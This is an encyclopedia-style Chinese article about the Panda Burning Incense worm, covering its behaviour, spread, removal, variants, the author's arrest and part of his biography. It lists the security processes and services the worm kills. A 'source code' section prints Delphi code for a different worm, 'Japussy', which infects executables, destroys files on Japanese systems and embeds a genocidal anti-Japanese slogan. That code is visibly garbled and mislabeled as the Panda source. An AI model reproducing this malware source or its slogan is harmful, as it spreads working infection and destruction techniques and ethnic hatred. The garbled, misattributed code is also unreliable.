跑吧:熊猫烧香病毒

　病毒名称:熊猫烧香 ，Worm.WhBoy.（金山称），Worm.Nimaya.  

（瑞星称）　　病毒别名：尼姆亚，武汉男生，后又化身为“金猪报喜”，国外称“熊猫烧香”　　危险级别：★★★★★　　病毒类型：蠕虫病毒，能够终止大量的反病毒软件和防火墙软件进程。　　影响系统：Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista　　发现时间：2006年10月16日　　来源地：中国武汉东湖高新技术开发区关山

编辑本段病毒描述

　　其实是一种蠕虫病毒的变种，而且是经过多次变种而来的，由于中毒电脑的可执行文件会出现“熊猫烧香”图案，所以也被称为  

“熊猫烧香”病毒。但原病毒只会对EXE图标进行替换，并不会对系统本身进行破坏。而大多数是中的病毒变种，用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时，该病毒的某些变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致企业局域网瘫痪，无法正常使用，它能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

编辑本段中毒症状

　　除了通过网站带毒感染用户之外，此病毒还会在局域网中传播，在极短时间之内就  

中毒时的电脑桌面

可以感染几千台计算机，严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

编辑本段病毒危害

　　病毒会删除扩展名为gho的文件，使用户无法使用ghost软件恢复操作系统。“熊猫烧香”感染系统的.exe .com. f.src .html.asp文件，添加病毒网址，导致用户一打开这些网页文件，IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe，可以通过U盘和移动硬盘等方式进行传播，并且利用Windows系统的自动播放功能来运行，搜索硬盘中的.exe可执行文件并感染，感染后的文件图标变成“熊猫烧香”图案。“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染，上传网页到网站后，就会导致用户浏览这些网站时也被病毒感染。  

中毒时会弹出的窗口

据悉，多家著名网站已经遭到此类攻击，而相继被植入病毒。由于这些网站的浏览量非常大，致使“熊猫烧香”病毒的感染范围非常广，中毒企业和政府机构已经超过千家，其中不乏金融、税务、能源等关系到国计民生的重要单位。注：江苏等地区成为“熊猫烧香”重灾区。

编辑本段传播方法

　　“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。　　金山分析：这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程　　1 拷贝文件　　病毒运行后,会把自己拷贝到　　C:\WINDOWS\System32\Drivers\spoclsv.exe　　2 添加注册表自启动　　病毒会添加自启动项　　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run　　svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe　　3 病毒行为　　a:每隔1秒　　寻找桌面窗口,并关闭窗口标题中含有以下字符的程序　　QQKav　　QQAV　　防火墙　　进程　　VirusScan　　网镖　　杀毒　　毒霸　　瑞星　　江民　　黄山IE　　超级兔子　　优化大师　　木马克星　　木马清道夫　　QQ病毒　　注册表编辑器　　系统配置实用程序　　卡巴斯基反病毒　　Symantec AntiVirus　　Duba　　esteem proces　　绿鹰PC　　密码防盗　　噬菌体　　木马辅助查找器　　System Safety Monitor　　Wrapped gift Killer　　Winsock Expert　　游戏木马检测大师　　msctls_statusbar32　　pjf(ustc)　　IceSword　　并使用的键盘映射的方法关闭安全软件IceSword　　添加注册表使自己自启动　　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run　　svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe　　并中止系统中以下的进程:　　Mcshield.exe　　VsTskMgr.exe　　naPrdMgr.exe　　UpdaterUI.exe　　TBMon.exe　　scan32.exe　　Ravmond.exe　　CCenter.exe　　RavTask.exe　　Rav.exe　　Ravmon.exe　　RavmonD.exe　　RavStub.exe　　KVXP.kxp　　kvMonXP.kxp　　KVCenter.kxp　　KVSrvXP.exe　　KRegEx.exe　　UIHost.exe　　TrojDie.kxp　　FrogAgent.exe　　Logo1_.exe　　Logo_1.exe　　Rundl132.exe　　b:每隔18秒　　点击病毒作者指定的网页,并用命令行检查系统中是否存在共享　　共存在的话就运行net share命令关闭admin$共享　　c:每隔10秒　　下载病毒作者指定的文件,并用命令行检查系统中是否存在共享　　共存在的话就运行net share命令关闭admin$共享　　d:每隔6秒　　删除安全软件在注册表中的键值　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run　　RavTask　　KvMonXP　　kav　　KAVPersonal50　　McAfeeUpdaterUI　　Network Associates Error Reporting Service　　ShStartEXE　　YLive.exe　　yassistse　　并修改以下值不显示隐藏文件　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL　　CheckedValue -> 0x00　　删除以下服务:　　navapsvc　　wscsvc　　KPfwSvc　　SNDSrvc　　ccProxy　　ccEvtMgr　　ccSetMgr　　SPBBCSvc　　Symantec Core LC　　NPFMntor　　MskService　　FireSvc　　e:感染文件　　病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部　　并在扩展名为htm,html, asp,php,jsp,aspx的文件中添加一网址,　　用户一但打开了该文件,IE就会不断的在后台点击写入的网址,达到　　增加点击量的目的,但病毒不会感染以下文件夹名中的文件:　　WINDOW　　Winnt　　System Volume Information　　Recycled　　Windows NT　　WindowsUpdate　　Windows Media Player　　Outlook Express　　Internet Explorer　　NetMeeting　　Common Files　　ComPlus Applications　　Messenger　　InstallShield Installation Information　　MSN　　Microsoft Frontpage　　Movie Maker　　MSN Gamin Zone　　g:删除文件　　病毒会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件　　使用户的系统备份文件丢失.　　瑞星最新病毒分析报告：“Nimaya（熊猫烧香）”　　这是一个传染型的DownLoad 使用Delphi编写

编辑本段传播对象和运行过程

本地磁盘感染

　　病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行文件遍历感染　　  

注:不感染文件大小超过10485760字节以上的.　　(病毒将不感染如下目录的文件):　　Microsoft Frontpage　　Movie Maker　　MSN Gamin Zone　　Common Files　　Windows NT　　Recycled　　System Volume Information　　Documents and Settings　　……　　(病毒将不感染文件名如下的文件):　　setup.exe　　病毒将使用两类感染方式应对不同后缀的文件名进行感染　　1)二进制可执行文件(后缀名为:EXE,SCR,PIF,COM): 将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.　　2)脚本类(后缀名为:htm,html,asp,php,jsp,aspx): 在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):　　　　在感染时会删除这些磁盘上的后缀名为.GHO

生成autorun.inf

　　病毒建立一个计时器以，6秒为周期在磁盘的根目录下生成setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联使病毒在用户点击被感染磁盘时能被自动运行。

局域网传播

　　病毒生成随机个局域网传播线程实现如下的传播方式：　　当病毒发现能成功联接攻击目标的139或445端口后，将使用内置的一个用户列表及密码字典进行联接。（猜测被攻击端的密码）当成功的联接上以后将自己复制过去并利用计划任务启动激活病毒。　　修改操作系统的启动关联　　下载文件启动　　与杀毒软件对抗

编辑本段杀毒方法

　　各种版本的熊猫烧香专杀　　瑞星　金山　江民　　超级巡警　李俊　　　虽然用户及时更新杀毒软件病毒库，并下载各杀毒软件公司提供的专杀工具，即可对“熊猫烧香”病毒进行查杀，但是如果能做到防患于未然岂不更好。

编辑本段解决办法

　　【1】 立即检查本机administrator组成员口令，一定要放弃简单口令甚至空口令，安全的口令是字母数字特殊字符的组合，自己记得住，别让病毒猜到就行。　　  

修改方法

　　右键单击我的电脑，选择管理，浏览到本地用户和组，在右边的窗格中，选择具备管理员权限的用户名，单击右键，选择设置密码，输入新密码就行。　　【2】 利用组策略，关闭所有驱动器的自动播放功能。

步骤1

　　单击开始，运行，输入gpedit.msc，打开组策略编辑器，浏览到计算机配置，管理模板，系统，在右边的窗格中选择关闭自动播放，该配置缺省是未配置，在下拉框中选择所有驱动器，再选取已启用，确定后关闭。最后，在开始，运行中输入gpupdate，确定后，该策略就生效了。　　【3】 修改文件夹选项，以查看不明文件的真实属性，避免无意双击骗子程序中毒。

步骤2

　　打开资源管理器(按windows徽标键＋E)，点工具菜单下文件夹选项，再点查看，在高级设置中，选择查看所有文件，取消隐藏受保护的操作系统文件，取消隐藏文件扩展名。　　【4】 时刻保持操作系统获得最新的安全更新，不要随意访问来源不明的网站，特别是微软的MS06-014漏洞，应立即打好该漏洞补丁。　　同时，QQ、UC的漏洞也可以被该病毒利用，因此，用户应该去他们的官方网站打好最新补丁。此外，由于该病毒会利用IE浏览器的漏洞进行攻击，因此用户还应该给IE打好所有的补丁。如果必要的话，用户可以暂时换用Firefox、Opera等比较安全的浏览器。　　【5】 启用Windows防火墙保护本地计算机。同时，局域网用户尽量避免创建可写的共享目录，已经创建共享目录的应立即停止共享。　　此外，对于未感染的用户，病毒专家建议，不要登录不良网站，及时下载微软公布的最新补丁，来避免病毒利用漏洞袭击用户的电脑，同时上网时应采用“杀毒软件+防火墙”的立体防御体系。

编辑本段病毒源码

　　program Japussy;　　uses　　Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};　　const　　HeaderSize = 82432; //病毒体的大小　　IconOffset = EB8; //PE文件主图标的偏移量　　//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同　　//查找2800000020的十六进制字符串可以找到主图标的偏移量　　{　　HeaderSize = 38912; //Upx压缩过病毒体的大小　　IconOffset = BC; //Upx压缩过PE文件主图标的偏移量　　//Upx 1.24W 用法: upx -9 --8086 Japussy.exe　　}　　IconSize = E8; //PE文件主图标的大小--744字节　　IconTail = IconOffset + IconSize; //PE文件主图标的尾部　　ID = 444444; //感染标记　　//垃圾码，以备写入　　Catchword = 'If a race need to be killed out, it must be Yamato. ' +　　'If a country need to be destroyed, it must be Japan! ' +　　'*** W32.Japussy.Worm.A ***';　　{$R *.RES}　　function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;　　stDCall; external 'Kernel32.dll'; //函数声明　　var　　TmpFile: string;　　Si: STARTUPINFO;　　Pi: PROCESS_INFORMATION;　　IsJap: Boolean = False; //日文操作系统标记　　{ 判断是否为Win9x }　　function IsWin9x: Boolean;　　var　　Ver: TOSVersionInfo;　　begin　　Result := False;　　Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);　　if not GetVersionEx(Ver) then　　Exit;　　if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x　　Result := True;　　end;　　{ 在流之间复制 }　　procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;　　dStartPos: Integer; Count: Integer);　　var　　sCurPos, dCurPos: Integer;　　begin　　sCurPos := Src.Position;　　dCurPos := Dst.Position;　　Src.Seek(sStartPos, 0);　　Dst.Seek(dStartPos, 0);　　Dst.CopyFrom(Src, Count);　　Src.Seek(sCurPos, 0);　　Dst.Seek(dCurPos, 0);　　end;　　{ 将宿主文件从已感染的PE文件中分离出来，以备使用 }　　procedure ExtractFile(FileName: string);　　var　　sStream, dStream: TFileStream;　　begin　　try　　sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);　　try　　dStream := TFileStream.Create(FileName, fmCreate);　　try　　sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分　　dStream.CopyFrom(sStream, sStream.Size - HeaderSize);　　finally　　dStream.Free;　　end;　　finally　　sStream.Free;　　end;　　except　　end;　　end;　　{ 填充STARTUPINFO结构 }　　procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);　　begin　　Si.cb := SizeOf(Si);　　Si.lpReserved := nil;　　Si.lpDesktop := nil;　　Si.lpTitle := nil;　　Si.dwFlags := STARTF_USESHOWWINDOW;　　Si.wShowWindow := State;　　Si.cbReserved2 := 0;　　Si.lpReserved2 := nil;　　end;　　{ 发带毒邮件 }　　procedure SendMail;　　begin　　//邮件终止　　end;　　{ 感染PE文件 }　　procedure InfectOneFile(FileName: string);　　var　　HdrStream, SrcStream: TFileStream;　　IcoStream, DstStream: TMemoryStream;　　iID: LongInt;　　aIcon: TIcon;　　Infected, IsPE: Boolean;　　i: Integer;　　Buf: array[0..1] of Char;　　begin　　try //出错则文件正在被使用，退出　　if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染　　Exit;　　Infected := False;　　IsPE := False;　　SrcStream := TFileStream.Create(FileName, fmOpenRead);　　try　　for i := 0 to 8 do //检查PE文件头　　begin　　SrcStream.Seek(i, soFromBeginning);　　SrcStream.Read(Buf, 2);　　if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记　　begin　　IsPE := True; //是PE文件　　Break;　　end;　　end;　　SrcStream.Seek(-4, soFromEnd); //检查感染标记　　SrcStream.Read(iID, 4);　　if (iID = ID) or (SrcStream.Size 16) and (SearchRec.Name '.') and　　(SearchRec.Name '..') then　　Result := 0 //不是目录　　else if (SearchRec.Attr = 16) and (SearchRec.Name '.') and　　(SearchRec.Name '..') then　　Result := 1 //不是根目录　　else Result := 2; //是根目录　　end;　　begin　　if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then　　begin　　repeat　　PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑　　if IsValidDir(SearchRec) = 0 then　　begin　　Fn := Path + SearchRec.Name;　　Ext := UpperCase(ExtractFileExt(Fn));　　if (Ext = '.EXE') or (Ext = '.SCR') then　　begin　　InfectOneFile(Fn); //感染可执行文件　　end　　else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then　　begin　　//感染HTML和ASP文件，将Base64编码后的病毒写入　　//感染浏览此网页的所有用户　　//哪位大兄弟愿意完成之？　　end　　else if Ext = '.WAB' then //Outlook地址簿文件　　begin　　//获取Outlook邮件地址　　end　　else if Ext = '.ADC' then //Foxmail地址自动完成文件　　begin　　//获取Foxmail邮件地址　　end　　else if Ext = 'IND' then //Foxmail地址簿文件　　begin　　//获取Foxmail邮件地址　　end　　else　　begin　　if IsJap then //是倭文操作系统　　begin　　if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or　　(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or　　(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or　　(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or　　(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or　　(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then　　SmashFile(Fn); //摧毁文件　　end;　　end;　　end;　　//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑　　Sleep(200);　　until (FindNext(SearchRec) 0);　　end;　　FindClose(SearchRec);　　SubDir := TStringList.Create;　　if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then　　begin　　repeat　　if IsValidDir(SearchRec) = 1 then　　SubDir.Add(SearchRec.Name);　　until (FindNext(SearchRec) 0);　　end;　　FindClose(SearchRec);　　Count := SubDir.Count - 1;　　for i := 0 to Count do　　LoopFiles(Path + SubDir.Strings + '\', Mask);　　FreeAndNil(SubDir);　　end;　　{ 遍历磁盘上所有的文件 }　　procedure InfectFiles;　　var　　DriverList: string;　　i, Len: Integer;　　begin　　if GetACP = 932 then //日文操作系统　　IsJap := True; //去死吧！　　DriverList := GetDrives; //得到可写的磁盘列表　　Len := Length(DriverList);　　while True do //死循环　　begin　　for i := Len downto 1 do //遍历每个磁盘驱动器　　LoopFiles(DriverList + ':\', '*.*'); //感染之　　SendMail; //发带毒邮件　　Sleep(1000 * 60 * 5); //睡眠5分钟　　end;　　end;　　{ 主程序开始 }　　begin　　if IsWin9x then //是Win9x　　RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程　　else //WinNT　　begin　　//远程线程映射到Explorer进程　　//哪位兄台愿意完成之？　　end;　　//如果是原始病毒体自己　　if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then　　InfectFiles //感染和发邮件　　else //已寄生于宿主程序上了，开始工作　　begin　　TmpFile := ParamStr(0); //创建临时文件　　Delete(TmpFile, Length(TmpFile) - 4, 4);　　TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格　　ExtractFile(TmpFile); //分离之　　FillStartupInfo(Si, SW_SHOWDEFAULT);　　CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,　　0, nil, '.', Si, Pi); //创建新进程运行之　　InfectFiles; //感染和发邮件　　end;　　end.　　CMD命令 shutdown -a 取消计算机中病毒后的倒即时关机

编辑本段变种病毒

　　至此，据不完全统计，仅12月份至今，变种数已达90多个，个人用户感染熊猫烧香的已经高达几百万，企业用户感染数还在继续上升。反防毒专家表示，伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀，该病毒正在不断“繁衍”新的变种，密谋更加隐蔽的传播方式。反病毒专家建议，用户不打开可疑邮件和可疑网站，不要随便运行不知名程序或打开陌生人邮件的附件。

变种

　　金猪报喜金猪报喜病毒实际就是最近熊猫烧香的新变种。春节将至，然而广大网络用户仍没有彻底摆脱“熊猫烧香”的阴霾。伴随着大量“熊猫烧香”变种的出现，对用户的危害一浪高过一浪。1月29日，来自金山毒霸反病毒中心最新消息：“熊猫烧香”化身“金猪”，危害指数再度升级，被感染的电脑中不但“熊猫”成群，而且“金猪”满圈。但象征财富的金猪仍然让用户无法摆脱“系统被破坏，大量应用软件无法应用”的噩梦。

病毒描述

　　“武汉男生”，俗称“熊猫烧香”， 近日又化身为“金猪报喜” ，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成可爱金猪的模样。　　1月30日，江民科技反病毒中心监测到，肆虐互联网的“熊猫烧香”又出新变种。此次变种把“熊猫烧香”图案变成“金猪报喜”。江民反病毒专家提醒用户，春节临近，谨防春节期间病毒借人们互致祝福之际大面积爆发。

专家介绍

　　“熊猫烧香”去年11月中旬被首次发现，短短两个月时间，新老变种已达700多种个，据江民反病毒预警中心监测到的数据显示，“熊猫烧香”病毒去年12月一举闯入病毒排名前20名，1月份更是有望进入前10名。疫情最严重的地区分别为：广东、山东、江苏、北京和辽宁。　　针对该病毒，江民杀毒软件KV系列已紧急升级，用户升级到最新病毒库即可有效防范该病毒于系统之外。江民“熊猫烧香”专杀工具已同步更新，未安装杀毒软件的用户可以登陆江民网站下载杀毒。此外，针对“熊猫烧香”变种频繁的特征，江民杀毒软件KV2007主动防御规则库可彻底防范“熊猫烧香”及其变种，用户可以登陆江民反病毒论坛下载使用。　　金山毒霸反病毒专家戴光剑指出，伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀，该病毒正在不断“繁衍”新的变种，密谋更加隐蔽的传播方式。据不完全统计，仅12月份至今，变种数已达90多个，个人用户感染熊猫烧香的已经高达几百万，企业用户感染数还在继续上升。　　此外学生寒假开始，上网人群短期内集中上升，病毒的传播速度也空前加快，所以用户在进行上网的过程中要更加警惕病毒的入侵。据了解，前几天在网络上出现了“熊猫烧香”作者声称不再有变种出现，而“金猪”的出现再次粉碎了人们的美梦，再次将人们拉回到熊猫烧香的梦魇之中。专家称，按照目前“熊猫烧香”破坏程度，威胁将延伸至春节。　　专家提醒大家，遇到“金猪”不要心慌，用熊猫烧香专杀工具就可以完全对付这只小金猪啦！

编辑本段相关报道和评论

　　‘流氓软件’和病毒之间的界限已变得越来越模糊。为了达到更好的传播效果，并减少成本，不少中小厂商直接使用病毒进行‘流氓推广’。”昨日，反病毒专家直指流氓软件是这次“熊猫烧香”幕后黑手。　　据江民公司反病毒工程师称，已经发现了近期疯狂肆虐的“熊猫烧香”幕后势力的痕迹，“熊猫烧香”病毒被怀疑是由“超级巡警”软件的提供方在幕后推动，网上已经发现了产销一条龙盗窃销售网游设备的产业链。　　而从瑞星截获的“熊猫烧香(Worm.Nimaya)”样本进行分析，也有不少变种运行后会去从网上下载盗取“江湖”、“大话西游”、“魔兽”“梦幻西游”“穿越火线”“地下城与勇士”“AVA战地之王”等网络游戏账号的木马。用户的计算机一旦被感染这些木马，游戏的账号、装备等就会被黑客窃取。黑客通过在网上倒卖网游账号、装备等获利。　　流氓软件分化：部分“洗白” 部分病毒化。全民范围内的讨伐使流氓软件开始出现“分化”。　　北京瑞星股份有限公司反病毒工程师史瑀向《每日经济新闻》表示，迫于技术和舆论的压力，制作流氓软件的厂商开始两极分化。一些大牌互联网厂商逐渐“洗白”，将软件的“流氓”程度降低，还有一些厂商干脆放弃推广“流氓软件”。然而，仍有大量的中小厂商是通过“流氓软件”起家的，通过“流氓软件”进行广告推广已经成为其公司主要甚至是唯一的收入来源。2006年下半年开始，一些厂商为了生存，不惜铤而走险，使用更加卑劣的手段进行流氓推广，并且采用更加恶毒的技术公然向反病毒软件、反流氓软件工具挑战。　　据瑞星公司客户服务中心的统计数据表明，从2006年6月开始，用户计算机由于流氓软件问题导致崩溃的求助数量已经超过了病毒。　　据专家介绍，这一时期的“流氓软件”有两大特点：一是编写病毒化。不少“流氓软件”为了防止被杀毒软件或流氓软件卸载工具发现，采用了病毒常用的Rootkit技术进行自我保护。Rootkit可以对自身及指定的文件进行隐藏或锁定，防止被发现和删除。带有Rootkit的“流氓软件”就像练就了“金钟罩”、“铁布杉”，不除去这层保护根本难伤其毫发。更有一些流氓软件，采用“自杀式”技术攻击杀毒软件。一旦发现用户安装或运行杀毒软件，便运行恶意代码，直接造成计算机死机、蓝屏，让用户误以为是杀毒软件存在问题。　　二是传播病毒化。为了达到更好的传播效果，并减小成本，不少中小厂商直接使用病毒进行“流氓推广”。用户的计算机感染病毒后，病毒会自动在后台运行，下载并安装“流氓软件”。同时，“流氓软件”安装后也会去从互联网自动下载运行病毒。大量的“流氓软件”开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等，这些行为严重危害到用户的信息安全和利益。“流氓软件”和病毒之间的界限已变得越来越模糊。随着“流氓软件”不断朝着病毒的方向发展，要想彻底杀灭“流氓软件”就必须采用反病毒技术。　　利益驱使 流氓软件制造“熊猫烧香”？　　史瑀表示，2006年11月14日，瑞星发布流氓软件专用清除工具———卡卡上网安全助手3.0，首次将反病毒技术应用于反流氓软件当中。就在卡卡刚刚发布24小时，就有一个名为“my123”的恶意程序顶风作案，疯狂采用病毒化的编写技术来逃避卡卡的追杀，随后又出现了两个流氓软件，它们锁定用户浏览器的首页以提高其网站访问量。　　此后，部分流氓软件开始和病毒合作。早先一个传播较广的蠕虫病毒“威金蠕虫(Worm.Viking)”，就会从病毒作者指定的网站去下载流氓软件、盗号木马等，并种植在用户的计算机上。　　“大量‘流氓软件’开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等，这些行为严重危害到用户的信息安全和利益。”史瑀称，“‘熊猫烧香’病毒成为一个‘教科书’式的病毒，势必有大量的病毒会模仿它的特征进行编写。”　　1月29日，金山毒霸反病毒中心最新消息：“熊猫烧香”化身“金猪”，危害指数再度升级，按照目前“熊猫烧香”破坏程度，威胁将延伸至春节。而在瑞星全球反病毒监测网27日监测结果显示，27日一个“电眼间谍变种BSF(Trojan.Spy.Delf.bsf)”病毒又出现，该病毒与“熊猫烧香”病毒类似。　　而业内人士称，近日由于地震引起海底光缆中断，造成数百万使用国外杀毒软件的个人用户、数十万企业和政府局域网用户无法升级。这又意味着这些用户的电脑完全向病毒和黑客敞开了大门。　　“在没有法律法规出台前，流氓软件是不会缩手的，不排除‘熊猫烧香’是流氓软件所为。”昨日，中国反流氓软件联盟李佳衡表示：“只要有利益驱使，流氓软件就会变化形式，以更不容易察觉的病毒方式毫无忌惮地牟取利益。”　　熊猫烧香”化身“金猪”，春节大爆发。　　“长假是病毒的高发期，特别是长假之后，病毒综合症接踵而来。”金山毒霸反病毒专家戴光剑说，“目前我们已经截获‘金猪’的变种。被感染的电脑中不但‘熊猫’成群，而且‘金猪’能使系统被破坏，大量软件无法应用。”这一观点得到了上海市计算机病毒防范服务中心的认同。　　一旦中毒，用户也不用慌张，用户可拨打上海市信息化服务热线电话9682000寻求帮助。　　“熊猫烧香”病毒攻略：防御和解除方法　　计世网消息 在2007年新年出现的“PE_FUJACKS”就是最近让广大互联网用户闻之色变的“熊猫烧香”。该病毒的作者为“武汉男生”(文件末签名”WhBoy”)，这个版本的病毒已经集成了PE_FUJA CK和QQ大盗的代码，通过网络共享,文件感染和移动存储设备传播，尤其是感染网页文件，并在网页文件写入自动更新的代码，一旦浏览该网页，就会感染更新后的变种。　　不幸中招的用户都知道，“熊猫烧香”会占用局域网带宽，使得电脑变得缓慢，计算机会出现以下症状：熊猫烧香病毒会在网络共享文件夹中生成一个名为GameSetup.exe的病毒文件；结束某些应用程序以及防毒软件的进程，导致应用程序异常，或不能正常执行，或速度变慢；硬盘分区或者U盘不能访问使用；exe程序无法使用程序图标变成熊猫烧香图标；硬盘的根目录出现setup.exe auturun.INF文件 ；同时浏览器会莫名其妙地开启或关闭。　　该病毒主要通过浏览恶意网站、网络共享、文件感染和移动存储设备(如U盘)等途径感染，其中网络共享和文件感染的风险系数较高，而通过Web和移动存储感染的风险相对较低。该病毒会自行启动安装，生成注册列表和病毒文件%System%\drivers\spoclsv.exe ，并在所有磁盘跟目录下生成病毒文件setup.exe,autorun.inf 。　　应用统一变为熊猫烧香的图标其实就是在注册表的HKEY_CLASSES_ROOT这个分支中写入了一个值，将所有的EXE文件图标指向一个图标文件，所以一般只要删除此值，改回原貌就可以了。

编辑本段破案介绍

　　我国破获的国内首例制作计算机病毒的大案　　[2007年2月12日]湖北省公安厅12日宣布，根据统一部署，湖北网监在浙江、山东、广西、天津、广东、四川、江西、云南、新疆、河南等地公安机关的配合下，一举侦破了制作传播“熊猫烧香”病毒案，抓获病毒作者李俊（男，25岁，武汉新洲区人），他于2006年10月16日编写了“熊猫烧香”病毒并在网上广泛传播，并且还以自己出售和由他人代卖的方式，在网络上将该病毒销售给120余人，非法获利10万余元。　　其他重要犯罪嫌疑人：雷磊（男，25岁，武汉新洲区人）、王磊（男，22岁，山东威海人）、叶培新（男，21岁，浙江温州人）、张顺（男，23岁，浙江丽水人）、王哲（男，24岁，湖北仙桃人）通过改写、传播“熊猫烧香”等病毒，构建“僵尸网络”，通过盗窃各种游戏账号等方式非法牟利。　　这是中国近些年来，发生比较严重的一次蠕虫病毒发作。影响较多公司，造成较大的损失。且对于一些疏于防范的用户来说，该病毒导致较为严重的损失。　　由于此病毒可以盗取用户名与密码，因此，带有明显的牟利目的。所以，作者才有可能将此病毒当作商品出售，与一般的病毒制作者只是自娱自乐、或显示威力、或炫耀技术有很大的不同。　　另，制作者李俊在被捕后，在公安的监视下，又在编写解毒软件。

编辑本段制作者简介

　　熊猫烧香制作者：李俊　　2月3日，“熊猫烧香”电脑病毒制造者李俊在武汉落网。“熊猫烧香”被列为去年十大电脑病毒之首，曾让上百万台电脑受害。李俊究竟是怎样走上制造病毒的道路？

童年时喜欢拆装东西

　　2月11日，农历腊月二十四，在武汉市新洲区阳逻街上的农贸市场里，每个小摊上都围满了采购年货的居民。李俊的家就在市场附近。　　按照当地风俗，这一天是“小年”，全家人要团聚“供奉”先人。想到尚在看守所的李俊，家里人哭得一塌糊涂。　　此前6天，警方带着李俊的弟弟李明回家了，并带来了李俊被抓的消息。从那天开始，父亲李立涛（化名）、母亲张淑桦（化名）寝食难安。　　几天后，51岁的张淑桦停掉了早点买卖。以前，她每天凌晨3点多钟就要起床准备面条、米粉、餐具。“哪还有心情再出摊。”张淑桦说着说着眼泪就掉了下来。　　张淑桦和李立涛原来都是湖北娲石股份有限公司的职工。2005年7月，李立涛被买断工龄“下岗”，53岁的他现在阳逻一家工厂做机械维修。张淑桦去年年底退休，两人现在的收入在2000元左右。　　“家里条件一直不好，想着两个儿子将来还有很多地方要花钱，我们两口子都50多岁了还一直在赚钱。”张淑桦说。　　在这个并不宽裕的家庭里，1982年9月，李俊降生了。对于李俊童年往事，张淑桦的记忆已有些模糊。她印象比较深刻的是，李俊喜欢拆装东西，家里的汽车玩具、废弃的钟表都被他拆装过。　　张淑桦说，小时候起，李俊就有点内向、不爱讲话，亲戚朋友来了，他都不知道喊，显得有些不懂事。不过，除此之外，在张淑桦的眼里，童年的李俊和其他孩子没有任何不同，他还应该被归到老实孩子那一类。

没有上大学很遗憾

